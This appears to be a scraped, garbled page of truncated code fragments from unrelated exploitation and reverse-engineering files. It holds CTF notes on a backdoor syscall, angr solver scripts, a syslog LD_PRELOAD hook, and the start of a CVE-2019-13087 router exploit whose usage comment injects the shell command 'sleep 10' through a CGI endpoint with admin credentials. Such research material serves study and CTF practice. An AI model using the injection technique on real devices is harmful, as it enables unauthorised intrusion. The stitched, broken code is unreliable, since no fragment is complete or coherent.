''' | |
special backdoor syscall gives flag. | |
Something going on with call/ret too. | |
No ropping? | |
rax = 0x5add011 | |
rdi = ptr -> "please_give_me_flag" | |
rsi = 0x6942069420 | |
''' | |
from pwn import * |
def find_n(haystack, needle, n):
    """Return the index of occurrence number ``n`` of ``needle`` in ``haystack``.

    Occurrences are counted from zero, so ``n == 0`` gives the first match.
    Each search resumes one position after the previous hit, so overlapping
    matches are counted. The result is -1 when ``haystack`` holds fewer than
    ``n + 1`` occurrences.
    """
    position = haystack.find(needle)
    skips_left = n
    while True:
        # Stop on a miss, or once enough earlier occurrences were skipped.
        if position < 0 or skips_left < 1:
            return position
        position = haystack.find(needle, position + 1)
        skips_left -= 1
def mod_input(user_input, position, character): | |
user_input = list(user_input) |
import angr, claripy | |
from pwn import * | |
# Relative path to the target file; presumably the binary that angr loads.
# Being relative, it is resolved against the current working directory.
file_name = "./launch_code"
# 1639874435
# Test nonce
# NOTE(review): hard-coded sample value; presumably the real nonce is supplied
# at run time -- confirm before relying on results computed from this one.
nonce = 1639874435
def get_codes(nonce): |
import requests | |
import argparse | |
# URL template for the device's CGI endpoint; the "{}" placeholder is
# presumably filled with the host argument via str.format -- confirm in main().
# NOTE(review): the scheme is fixed to plain HTTP, so anything sent to this
# endpoint travels unencrypted on the wire.
base_url = "http://{}/cgi-bin/internet.cgi"
# Module-level dict, empty at import time; presumably populated with the
# request fields before sending -- confirm in main().
data = {}
# python CVE-2019-13087.py 192.168.1.1 admin password 'sleep 10' | |
def main(): | |
parser = argparse.ArgumentParser() |
#define _GNU_SOURCE | |
#include <stdarg.h> | |
#include <stdio.h> | |
#include <dlfcn.h> | |
//dockcross-linux-armv5 bash -c '$CC verbal_syslog.c -fPIC -shared -ldl -o Verbal_syslog_static.so' | |
void syslog(int priority, const char* format, ...) | |
{ | |
va_list args; | |
va_start(args, format); |
import angr | |
import claripy | |
import argparse | |
#angr logging is way too verbose | |
import logging | |
# Names of the top-level loggers to silence.
log_things = ["angr", "pyvex", "claripy", "cle"]
for log in log_things:
    logger = logging.getLogger(log)
    # NOTE(review): `disabled` drops every record on this logger, including
    # warnings and errors, and it is a per-logger flag that child loggers
    # (e.g. ones named "angr.<module>") do not inherit. If output still
    # appears, or if error messages are wanted, raising the level with
    # setLevel() on these loggers is the usual alternative -- confirm.
    logger.disabled = True